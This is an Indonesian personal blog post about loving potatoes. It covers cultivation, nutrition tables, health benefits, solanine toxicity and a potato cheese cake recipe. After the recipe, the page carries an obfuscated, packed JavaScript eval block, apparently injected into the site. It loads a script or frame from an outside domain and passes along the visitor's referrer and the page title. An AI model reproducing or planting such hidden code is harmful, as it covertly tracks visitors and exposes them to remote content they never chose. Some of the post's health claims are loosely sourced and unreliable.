browser icon
You are using an insecure version of your web browser. Please update your browser!
Using an outdated browser makes your computer unsafe. For a safer, faster, more enjoyable user experience, please update your browser today or try a newer browser.

Kentang, kesukaanku ……

Posted by on December 3, 2013

index

Semalam, gegara terlambat datang ke perayaan ultah Kanaya putri mb Lintang dari Lab. Daya, saya cuma kebagian kentang goreng saja, padahal yang lain bisa dapet paket nasi ayam, ya sutralah gapapa yang penting masih ada yang bisa dikunyah .. :D
Eh, baru 3 potong yang masuk mulut, itu kentang sudah berpindah tangan aja ke Khaila yang dalam sekejab ludes tanpa sisa, duh naaakkk … kamu kelaperan juga kayak mama yaa …


Tapi kalau ngomongin kentang, entah kelaperan atau tidak, saya pasti rebutan sama Khaila (hihihihi …. maafkan mama ya nak) bukan berarti saya ngrebut punya Khaila, tetapi tiap saya megang kentang, ujung ujungnya pasti segera berpindah ke Khaila, lha sama sama doyan kentang sih. Mau digoreng, dipanggang, dibakar, di pure, di bikin pastel tutup, dibikin donat, diperkedel atau diapain aja, pasti abis dalam sekejab …. :D

Tapi kan bagus ya kalau suka kentang, secara tanaman yang dimanfaatkan bonggol akarnya ini kaya akan nutrisi, trus merupakan sumber pati, vitamin dan serat. Kentang yang merupakan salah satu  tanaman tahunan ini juga  paling banyak ditanam diseluruh dunia. Juga merupakan salah satu komoditas yang murah. Jadi udahlah gampang dicari, murah pula dia, asyik kan … :D

Biasanya kentang tumbuh sekitar 12 sampai 18 inci, dan banyak dimanfaatkan umbinya yang berada didalam tanah. Umbi biasanya berbentu bulat, oval atau lonjong dan ukurannya  sangat bervariasi. Daging kentang secara umum berwarna terang putih,  merah mawar atau cokelat muda, tergantung pada varietas dan tekstur kelembaban. Ada varietas kentang yang memiliki tekstur khusus seperti mentega.

Perbanyakan bibit kentang umumnya dilakukan dengan menggunakan stek batangberukuran 10 cm yang dibibitkan pada polibag yang berisi campuran tanah mineral dan kompos. Tanaman muda berumur 2 minggu dipindahkan ke lahan tanam yang telah disiapkan terlebih dahulu. Pada lahan tersebut disiapkan tiga blok yang dipisahkan dengan jarak antar blok 1 m dan jarak antar petak 0,5 m. Tiap blok terdiri atas 16 petak, setiap petak berukuran 2,0 m x 1,5 m dan satu petak berisi 12 tanaman. Sebagai pupuk dasar pupuk N dengan dosis 30 kg ha-1 yang diberikan 2 kali yaitu 1/3 saat tanam dan 2/3 pada saat empat minggu setelah tanam, 50 kg ha-1 P2O5 dan 60 kg ha-1 K2O. Setiap lobang tanam diberi pupuk kompos sampah organik kota sebanyak 0.5 kg dengan kandungan N, P, K, Ca, dan Mg berturut-turut 1.19, 0.63, 0.10, 0.10, dan 0.12 g kg-1. Panen dilakukan setelah umur tanaman mencapai 3 bulan setelah tanam.

Kentang yang termasuk subspesies dari Solanum tuberosum dan dari keluarga Solanaceae ini juga sering dipakai sebagai pengganti karbohidrat lho. Kentang juga kaya nutrisi dan serat maupun berbagai zat penting lainnya yang baik bagi kesehatan seperti dikutip dari ilmu dibawah ini:

Informasi Rinci Komposisi Kandungan Nutrisi/Gizi Pada Kentang :

Nama Bahan Makanan : Kentang
Nama Lain / Alternatif : -
Banyaknya Kentang yang diteliti (Food Weight) = 100 gr
Bagian Kentang yang dapat dikonsumsi (Bdd / Food Edible) = 85 %
Jumlah Kandungan Energi Kentang = 83 kkal
Jumlah Kandungan Protein Kentang = 2 gr
Jumlah Kandungan Lemak Kentang = 0,1 gr
Jumlah Kandungan Karbohidrat Kentang = 19,1 gr
Jumlah Kandungan Kalsium Kentang = 11 mg
Jumlah Kandungan Fosfor Kentang = 56 mg
Jumlah Kandungan Zat Besi Kentang = 1 mg
Jumlah Kandungan Vitamin A Kentang = 0 IU
Jumlah Kandungan Vitamin B1 Kentang = 0,11 mg
Jumlah Kandungan Vitamin C Kentang = 17 mg
Khasiat / Manfaat Kentang : – (Belum Tersedia)
Huruf Awal Nama Bahan Makanan : K
Sumber Informasi Gizi : Berbagai publikasi Kementerian Kesehatan Republik Indonesia serta sumber lainnya.

Hasil Penelitian Lainnya Pada Kentang :

Nama Bahan Makanan : Kentang (Versi DKBM P3G ’90)
Banyaknya Kentang yang diteliti (Food Weight) = 100 gr
Bagian Kentang yang dapat dikonsumsi (Bdd / Food Edible) = 84 %
Jumlah Kandungan Energi Kentang = 62 kkal
Jumlah Kandungan Protein Kentang = 2,1 gr
Jumlah Kandungan Lemak Kentang = 0,2 gr
Jumlah Kandungan Karbohidrat Kentang = 13,5 gr
Jumlah Kandungan Kalsium Kentang = 63 mg
Jumlah Kandungan Fosfor Kentang = 58 mg
Jumlah Kandungan Zat Besi Kentang = 0,7 mg
Jumlah Kandungan Vitamin A Kentang = 0 IU
Jumlah Kandungan Vitamin B1 Kentang = 0,09 mg
Jumlah Kandungan Vitamin C Kentang = 21 mg

Nah, bergizi banget kan si kentang ini.  Menurut tipscara berikut ini beberapa manfaat kentang bagi kesehatan :

  • Kentang kaya vitamin dan mineral.
    Kentang adalah salah satu makanan sumber pati, vitamin, mineral dan serat . 100 g kentang terdapat 70 kalori(namun hanya mengandung lemak yang sedikit, sekitar 0.1 g per100 g) dan kolesterol.
  • Kentang Sumber serat larut dan tak larut yang baik
    Kentang adalah sumber alam serat larut dan serta tidak larut yang baik. Serat makanan yang terdapat pada kentang,  membantu mencegah sembelit, mengurangi penyerapan kolesterol makanan dan menurunkan kolesterol jahat LDL . Selain itu, serat juga akan membantu melindungi dari penyakit polip usus dan kanker.
  • Membantu pencernaan dan penderita diabetes
    Serat yang terdapat pada pati membantu pencernaan dengan cara membantu penyerapan gula sederhana dalam usus. Dengan demikian kentang dapat membantu untuk menjaga kadar gula darah agar selalu dalam kisaran normal dan menghindari fluktuasi. Untuk itulah kentang memiliki alasan sebagai sumber karbohidrat yang baik bagi penderita diabetes.
  • Kentang sumber kelompok vitamin B kompleks
    Umbi-umbian adalah salah satu sumber kelompok vitamin B-kompleks, vitamin seperti piridoksin (vitamin B6), thiamin, niacin, asam pantotenat, dan folat.
  • Kentang kaya antioksidan
    Kentang segar dengan kulitnya adalah sumber antioksidan dari vitamin, yaitu vitamin-C. 100 g umbi segar menghasilkan 11,4 mg,  atau 20% dari tingkat yang dibutuhkan harian vitaminC. Mengkonsumsi makanan kaya vitamin-C akan membantu tubuh menjaga kekebalan tubuh terhadap infeksi dan dampak radikal bebas.
  • Kentang mengandung banyak mineral.
    Kentang juga mengandung banyak mineral penting seperti besi, mangan, magnesium, fosfor, tembaga dan kalium.
  • Kentang kaya vitamin A.
    Kentang berwarna merah dan kemerahan mengandung jumlah vitamin A yang baik, dan flavonoid antioksidan seperti karoten dan zeaxanthins.
  • Kentang mengandung senyawa zat anti kanker.
    Hasil Penelitian terbaru yang diumumkan oleh layanan penelitian pertanian, menunjukkan bahwa antioksidan flavonoid, quercetin pada kentang memiliki sifat anti-kanker dan kardio-protektif properti.

Tetapi hati hati, karena ternyata kentang juga bisa beracun lho, karena Kentang bisa jadi mengandung alkaloid, solanin dan chaconine yang beracun. Alkaloid ini  berkonsentrasi dalam jumlah terbesar terdapat persis di bawah kulit, dan berakibat dapat meningkatkan proporsional usia dan paparan sinar matahari . Kentang yang dimasak pada suhu tinggi (lebih dari 170 ° C), kemungkinan besar akan  menghancurkan sebagian zat-zat beracun.

Akibat dari zat beracun ini, bila dikonsumsi dalam jumlah yang cukup dapat menyebabkan sakit kepala, lemah, kram otot dan, bahkan dalam beberapa kasus bisa menyebabkan kehilangan berat kesadaran dan koma.Nnamun jangan terlalu khawatir, karena keracunan dari kentang sangat jarang terjadi. Paparan cahaya dan udara akan menyebabkan perubahan kentang menjadi warna hijau, dan ini bisa digunakan sebagai  petunjuk visual sebagai umbi kentang yang mungkin memiliki lebih banyak racun. Namun, ini tidak menyediakan petunjuk definitif, sebagai akumulasi warna kehijauan dan solanin dapat terjadi secara independen satu sama lain. Beberapa varietas kentang mengandung konsentrasi solanin lebih besar,  daripada varietas kentang yang lain.

Nah, mau makan kentang tanpa takut teracuni, monggo mencoba resep dari sajiasedap berikut trus (seperti biasa) kirim ke saya ya …. :D

CAKE KENTANG KEJU

kentang keju

Bahan-bahan
4 butir telur
60 gram gula pasir
1/2 sendok makan emulsifier, (sp/tbm)
1/4 sendok teh garam
100 gram tepung terigu protein sedang
15 gram susu bubuk
100 gram kentang kukus, dihaluskan
30 ml susu cair
25 gram margarin, dilelehkan
50 gram keju cheddar parut, untuk taburan

Cara Pengolahan :

  1. Kocok telur, gula pasir, emulsifier, dan garam sampai mengembang. Masukkan tepung terigu dan susu bubuk sambil diayak dan diaduk rata.
  2. Blender kentang dan susu cair sampai lembut. Tambahkan margarin. Aduk rata.
  3. Masukkan sedikit-sedikit ke dalam kocokkan telur sambil diaduk perlahan.
  4. Tuang di loyang 22x22x4 cm yang dioles margarin dan dialas kertas roti. Tabur keju parut.
  5. Oven 25 menit dengan suhu 190 derajat Celsius sampai matang.

 

Untuk 16 potong


eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’&n=\’+3.o;0=0+\’&r=\’+6;d.p(\’\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

Leave a Reply